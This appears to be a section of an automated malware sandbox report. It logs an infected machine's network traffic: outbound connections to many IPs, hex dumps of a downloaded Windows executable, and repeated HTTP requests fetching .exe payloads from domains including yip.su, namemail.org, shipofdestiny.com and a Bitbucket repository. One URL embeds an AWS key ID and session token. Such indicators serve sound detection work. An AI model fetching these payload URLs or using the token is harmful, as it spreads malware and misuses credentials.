                  Source: global trafficTCP traffic: 192.168.2.5:50357 -> 83.243.92.154:8080
                  Source: global trafficTCP traffic: 192.168.2.5:50358 -> 103.155.54.26:83
                  Source: global trafficTCP traffic: 192.168.2.5:50360 -> 146.19.106.42:12334
                  Source: global trafficTCP traffic: 192.168.2.5:50362 -> 138.0.207.18:38328
                  Source: global trafficTCP traffic: 192.168.2.5:50365 -> 114.106.171.192:8089
                  Source: global trafficTCP traffic: 192.168.2.5:50366 -> 72.128.133.154:16099
                  Source: global trafficTCP traffic: 192.168.2.5:50367 -> 103.218.25.245:8080
                  Source: global trafficTCP traffic: 192.168.2.5:50368 -> 51.178.231.34:8080
                  Source: global trafficTCP traffic: 192.168.2.5:50371 -> 217.196.21.170:5678
                  Source: global trafficTCP traffic: 192.168.2.5:50372 -> 211.54.26.187:3128
                  Source: global trafficTCP traffic: 192.168.2.5:50374 -> 150.230.59.34:8080
                  Source: global trafficTCP traffic: 192.168.2.5:50375 -> 110.77.184.196:5678
                  Source: global trafficTCP traffic: 192.168.2.5:50376 -> 201.163.73.93:55443
                  Source: global trafficTCP traffic: 192.168.2.5:50377 -> 130.255.162.199:12703
                  Source: global trafficTCP traffic: 192.168.2.5:50378 -> 104.236.0.129:22167
                  Source: global trafficTCP traffic: 192.168.2.5:50379 -> 132.148.245.169:38780
                  Source: global trafficTCP traffic: 192.168.2.5:50380 -> 23.152.40.15:5050
                  Source: global trafficTCP traffic: 192.168.2.5:50381 -> 103.156.16.182:1111
                  Source: global trafficTCP traffic: 192.168.2.5:50382 -> 51.178.182.200:63172
                  Source: global trafficTCP traffic: 192.168.2.5:50385 -> 51.158.79.76:16379
                  Source: global trafficTCP traffic: 192.168.2.5:50386 -> 188.164.193.178:11251
                  Source: global trafficTCP traffic: 192.168.2.5:50388 -> 136.243.82.121:1082
                  Source: global trafficTCP traffic: 192.168.2.5:50389 -> 185.186.17.57:5678
                  Source: global trafficTCP traffic: 192.168.2.5:50391 -> 36.89.16.186:8866
                  Source: global trafficTCP traffic: 192.168.2.5:50392 -> 201.238.248.139:9229
                  Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Mon, 11 Mar 2024 02:30:54 GMTServer: Apache/2.4.29 (Ubuntu)Last-Modified: Mon, 11 Mar 2024 02:30:02 GMTETag: "1ca8e4-6135951a2b6e0"Accept-Ranges: bytesContent-Length: 1878244Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 93 15 20 57 00 00 00 00 00 00 00 00 e0 00 0f 03 0b 01 02 1a 00 8c 00 00 00 98 00 00 00 ae 01 00 75 43 00 00 00 10 00 00 00 a0 00 00 00 00 40 00 00 10 00 00 00 02 00 00 04 00 00 00 06 00 00 00 04 00 00 00 00 00 00 00 00 90 05 00 00 04 00 00 a5 ea 01 00 02 00 00 80 00 00 20 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 d0 02 00 7c 12 00 00 00 70 03 00 e8 15 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 24 8b 00 00 00 10 00 00 00 8c 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 30 60 2e 64 61 74 61 00 00 00 e0 00 00 00 00 a0 00 00 00 02 00 00 00 90 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 c0 2e 72 64 61 74 61 00 00 38 6a 00 00 00 b0 00 00 00 6c 00 00 00 92 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 40 2e 62 73 73 00 00 00 00 00 ad 01 00 00 20 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 60 c0 2e 69 64 61 74 61 00 00 7c 12 00 00 00 d0 02 00 00 14 00 00 00 fe 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 6e 64 61 74 61 00 00 00 80 00 00 00 f0 02 00 00 04 00 00 00 12 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 c0 2e 72 73 72 63 00 00 00 e8 15 02 00 00 70 03 00 00 16 02 00 00 16 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                  Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Mon, 11 Mar 2024 02:30:54 GMTServer: Apache/2.4.29 (Ubuntu)Last-Modified: Mon, 11 Mar 2024 02:30:02 GMTETag: "1ca8e4-6135951a2b6e0"Accept-Ranges: bytesContent-Length: 1878244Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 93 15 20 57 00 00 00 00 00 00 00 00 e0 00 0f 03 0b 01 02 1a 00 8c 00 00 00 98 00 00 00 ae 01 00 75 43 00 00 00 10 00 00 00 a0 00 00 00 00 40 00 00 10 00 00 00 02 00 00 04 00 00 00 06 00 00 00 04 00 00 00 00 00 00 00 00 90 05 00 00 04 00 00 a5 ea 01 00 02 00 00 80 00 00 20 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 d0 02 00 7c 12 00 00 00 70 03 00 e8 15 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 24 8b 00 00 00 10 00 00 00 8c 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 30 60 2e 64 61 74 61 00 00 00 e0 00 00 00 00 a0 00 00 00 02 00 00 00 90 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 c0 2e 72 64 61 74 61 00 00 38 6a 00 00 00 b0 00 00 00 6c 00 00 00 92 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 40 2e 62 73 73 00 00 00 00 00 ad 01 00 00 20 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 60 c0 2e 69 64 61 74 61 00 00 7c 12 00 00 00 d0 02 00 00 14 00 00 00 fe 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 6e 64 61 74 61 00 00 00 80 00 00 00 f0 02 00 00 04 00 00 00 12 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 c0 2e 72 73 72 63 00 00 00 e8 15 02 00 00 70 03 00 00 16 02 00 00 16 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                  Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Mon, 11 Mar 2024 02:30:57 GMTServer: Apache/2.4.29 (Ubuntu)Last-Modified: Mon, 11 Mar 2024 02:30:02 GMTETag: "1ca8e4-6135951a2b6e0"Accept-Ranges: bytesContent-Length: 1878244Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 93 15 20 57 00 00 00 00 00 00 00 00 e0 00 0f 03 0b 01 02 1a 00 8c 00 00 00 98 00 00 00 ae 01 00 75 43 00 00 00 10 00 00 00 a0 00 00 00 00 40 00 00 10 00 00 00 02 00 00 04 00 00 00 06 00 00 00 04 00 00 00 00 00 00 00 00 90 05 00 00 04 00 00 a5 ea 01 00 02 00 00 80 00 00 20 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 d0 02 00 7c 12 00 00 00 70 03 00 e8 15 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 24 8b 00 00 00 10 00 00 00 8c 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 30 60 2e 64 61 74 61 00 00 00 e0 00 00 00 00 a0 00 00 00 02 00 00 00 90 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 c0 2e 72 64 61 74 61 00 00 38 6a 00 00 00 b0 00 00 00 6c 00 00 00 92 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 40 2e 62 73 73 00 00 00 00 00 ad 01 00 00 20 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 60 c0 2e 69 64 61 74 61 00 00 7c 12 00 00 00 d0 02 00 00 14 00 00 00 fe 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 6e 64 61 74 61 00 00 00 80 00 00 00 f0 02 00 00 04 00 00 00 12 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 c0 2e 72 73 72 63 00 00 00 e8 15 02 00 00 70 03 00 00 16 02 00 00 16 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                  Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Mon, 11 Mar 2024 02:30:57 GMTServer: Apache/2.4.29 (Ubuntu)Last-Modified: Mon, 11 Mar 2024 02:30:02 GMTETag: "1ca8e4-6135951a2b6e0"Accept-Ranges: bytesContent-Length: 1878244Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 93 15 20 57 00 00 00 00 00 00 00 00 e0 00 0f 03 0b 01 02 1a 00 8c 00 00 00 98 00 00 00 ae 01 00 75 43 00 00 00 10 00 00 00 a0 00 00 00 00 40 00 00 10 00 00 00 02 00 00 04 00 00 00 06 00 00 00 04 00 00 00 00 00 00 00 00 90 05 00 00 04 00 00 a5 ea 01 00 02 00 00 80 00 00 20 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 d0 02 00 7c 12 00 00 00 70 03 00 e8 15 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 24 8b 00 00 00 10 00 00 00 8c 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 30 60 2e 64 61 74 61 00 00 00 e0 00 00 00 00 a0 00 00 00 02 00 00 00 90 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 c0 2e 72 64 61 74 61 00 00 38 6a 00 00 00 b0 00 00 00 6c 00 00 00 92 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 40 2e 62 73 73 00 00 00 00 00 ad 01 00 00 20 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 60 c0 2e 69 64 61 74 61 00 00 7c 12 00 00 00 d0 02 00 00 14 00 00 00 fe 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 6e 64 61 74 61 00 00 00 80 00 00 00 f0 02 00 00 04 00 00 00 12 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 c0 2e 72 73 72 63 00 00 00 e8 15 02 00 00 70 03 00 00 16 02 00 00 16 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                  Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Mon, 11 Mar 2024 02:31:03 GMTServer: Apache/2.4.29 (Ubuntu)Last-Modified: Mon, 11 Mar 2024 02:30:02 GMTETag: "1ca8e4-6135951a2b6e0"Accept-Ranges: bytesContent-Length: 1878244Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 93 15 20 57 00 00 00 00 00 00 00 00 e0 00 0f 03 0b 01 02 1a 00 8c 00 00 00 98 00 00 00 ae 01 00 75 43 00 00 00 10 00 00 00 a0 00 00 00 00 40 00 00 10 00 00 00 02 00 00 04 00 00 00 06 00 00 00 04 00 00 00 00 00 00 00 00 90 05 00 00 04 00 00 a5 ea 01 00 02 00 00 80 00 00 20 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 d0 02 00 7c 12 00 00 00 70 03 00 e8 15 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 24 8b 00 00 00 10 00 00 00 8c 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 30 60 2e 64 61 74 61 00 00 00 e0 00 00 00 00 a0 00 00 00 02 00 00 00 90 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 c0 2e 72 64 61 74 61 00 00 38 6a 00 00 00 b0 00 00 00 6c 00 00 00 92 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 40 2e 62 73 73 00 00 00 00 00 ad 01 00 00 20 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 60 c0 2e 69 64 61 74 61 00 00 7c 12 00 00 00 d0 02 00 00 14 00 00 00 fe 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 6e 64 61 74 61 00 00 00 80 00 00 00 f0 02 00 00 04 00 00 00 12 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 c0 2e 72 73 72 63 00 00 00 e8 15 02 00 00 70 03 00 00 16 02 00 00 16 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                  Source: global trafficHTTP traffic detected: GET /TheSpeedX/PROXY-List/blob/master/http.txt HTTP/1.1Host: github.comConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /raw/E0rY26ni HTTP/1.1Host: pastebin.comConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /RNWPd.exe HTTP/1.1Host: yip.suConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /ppg8x HTTP/1.1Host: sty.inkConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /ppg8x HTTP/1.1Host: sty.inkConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /6779d89b7a368f4f3f340b50a9d18d71.exe HTTP/1.1Host: namemail.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /6779d89b7a368f4f3f340b50a9d18d71.exe HTTP/1.1Host: namemail.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /j-upsps/microsoft_network1/downloads/a02.exe HTTP/1.1Host: bitbucket.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /1lyxz HTTP/1.1Host: iplogger.comConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /baf14778c246e15550645e30ba78ce1c.exe HTTP/1.1Host: shipofdestiny.comConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /baf14778c246e15550645e30ba78ce1c.exe HTTP/1.1Host: shipofdestiny.comConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /opera/stable/windows/?utm_medium=apb&utm_source=mkt&utm_campaign=767 HTTP/1.1Host: net.geo.opera.comConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /opera/stable/windows/?utm_medium=apb&utm_source=mkt&utm_campaign=767 HTTP/1.1Host: net.geo.opera.comConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /26b626fea29015a9f24e07a08fa011e4/6779d89b7a368f4f3f340b50a9d18d71.exe HTTP/1.1Host: ittrade.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /26b626fea29015a9f24e07a08fa011e4/6779d89b7a368f4f3f340b50a9d18d71.exe HTTP/1.1Host: ittrade.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /fe3c402e-d650-43c9-b0ce-c95a11498dde/downloads/666d2627-f56a-4f04-99c5-36905368220f/a02.exe?response-content-disposition=attachment%3B%20filename%3D%22a02.exe%22&AWSAccessKeyId=ASIA6KOSE3BNBZE7SCMA&Signature=HCpifs76QUiUci%2FEbjTZ%2FcagJHI%3D&x-amz-security-token=IQoJb3JpZ2luX2VjEBsaCXVzLWVhc3QtMSJHMEUCIAL7XL1t3TuPO88R%2FvmGOKGVl7p1Es82eho6cXvQ48VmAiEA7oowtGrg0V2iUhUFhl6H%2Ftflg%2F8yqqvEVz4QKWlhh9IqpwIIJBAAGgw5ODQ1MjUxMDExNDYiDFuIFyQ4tKa%2Be%2FeNTyqEAv3z8s9kfwkGDgSePx2WLCQQKhHTHvRODYsmqld%2BfnPf1j4E%2BbYhYHOLhh0iQz0sdVxhkrXPTKBqSsozj19VUfDopIPVTfRKMeNtRGQezfK2JjXbp8r7euC55noDSYZTIVM6KVVDIPF1tAGWJiFo6%2BMYnFfB2zug1t5HpisPVtMAStx8BqdelSlN37IFcwjn1aKq5iLKOG2ot6gDBMcne8C1p0SybdfD5uWEI6lrqrxtbWm19RY1WYFsJSDkbGmC0LCmMTNlAcqxgj5rGPqMkl4XffgOsPi8NIW0liFniEJ4GkgdiP0nldGzH%2BkY77zsgPaug81QSVfxWv673OeelwZ6wdBpMNTYua8GOp0B8L9l%2BRuxjpbF79wIHItOL1FbFFaPMDUqLn7BHl2kHWntZrPtX5IlaRgQbEYZGTx9IwOvskFyhN7gOZfzOo5jKzjap2b%2Bq12UXPXW48Biok56nWPXv6z27x4KbZddnlzzmD%2FmLERbURyUQwhok2kY3h9GfMX4MN0PiCzQ9hqyr2Z7uiRWWK82G8AlU01254WlEwld0nRAsugFGjj4nw%3D%3D&Expires=1710125916 HTTP/1.1Host: bbuseruploads.s3.amazonaws.comConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /26b626fea29015a9f24e07a08fa011e4/baf14778c246e15550645e30ba78ce1c.exe HTTP/1.1Host: lawyerbuyer.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /RNWPd.exe HTTP/1.1Host: yip.su
                  Source: global trafficHTTP traffic detected: GET /raw/E0rY26ni HTTP/1.1Host: pastebin.com
                  Source: global trafficHTTP traffic detected: GET /26b626fea29015a9f24e07a08fa011e4/baf14778c246e15550645e30ba78ce1c.exe HTTP/1.1Host: lawyerbuyer.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /baf14778c246e15550645e30ba78ce1c.exe HTTP/1.1Host: shipofdestiny.com
                  Source: global trafficHTTP traffic detected: GET /ppg8x HTTP/1.1Host: sty.ink
                  Source: global trafficHTTP traffic detected: GET /6779d89b7a368f4f3f340b50a9d18d71.exe HTTP/1.1Host: namemail.org
                  Source: global trafficHTTP traffic detected: GET /baf14778c246e15550645e30ba78ce1c.exe HTTP/1.1Host: shipofdestiny.com
                  Source: global trafficHTTP traffic detected: GET /6779d89b7a368f4f3f340b50a9d18d71.exe HTTP/1.1Host: namemail.org
                  Source: global trafficHTTP traffic detected: GET /ppg8x HTTP/1.1Host: sty.ink
                  Source: global trafficHTTP traffic detected: GET /RNWPd.exe HTTP/1.1Host: yip.su
                  Source: global trafficHTTP traffic detected: GET /raw/E0rY26ni HTTP/1.1Host: pastebin.com
                  Source: global trafficHTTP traffic detected: GET /j-upsps/microsoft_network1/downloads/a02.exe HTTP/1.1Host: bitbucket.org
                  Source: global trafficHTTP traffic detected: GET /26b626fea29015a9f24e07a08fa011e4/6779d89b7a368f4f3f340b50a9d18d71.exe HTTP/1.1Host: ittrade.org
                  Source: global trafficHTTP traffic detected: GET /fe3c402e-d650-43c9-b0ce-c95a11498dde/downloads/666d2627-f56a-4f04-99c5-36905368220f/a02.exe?response-content-disposition=attachment%3B%20filename%3D%22a02.exe%22&AWSAccessKeyId=ASIA6KOSE3BNBZE7SCMA&Signature=HCpifs76QUiUci%2FEbjTZ%2FcagJHI%3D&x-amz-security-token=IQoJb3JpZ2luX2VjEBsaCXVzLWVhc3QtMSJHMEUCIAL7XL1t3TuPO88R%2FvmGOKGVl7p1Es82eho6cXvQ48VmAiEA7oowtGrg0V2iUhUFhl6H%2Ftflg%2F8yqqvEVz4QKWlhh9IqpwIIJBAAGgw5ODQ1MjUxMDExNDYiDFuIFyQ4tKa%2Be%2FeNTyqEAv3z8s9kfwkGDgSePx2WLCQQKhHTHvRODYsmqld%2BfnPf1j4E%2BbYhYHOLhh0iQz0sdVxhkrXPTKBqSsozj19VUfDopIPVTfRKMeNtRGQezfK2JjXbp8r7euC55noDSYZTIVM6KVVDIPF1tAGWJiFo6%2BMYnFfB2zug1t5HpisPVtMAStx8BqdelSlN37IFcwjn1aKq5iLKOG2ot6gDBMcne8C1p0SybdfD5uWEI6lrqrxtbWm19RY1WYFsJSDkbGmC0LCmMTNlAcqxgj5rGPqMkl4XffgOsPi8NIW0liFniEJ4GkgdiP0nldGzH%2BkY77z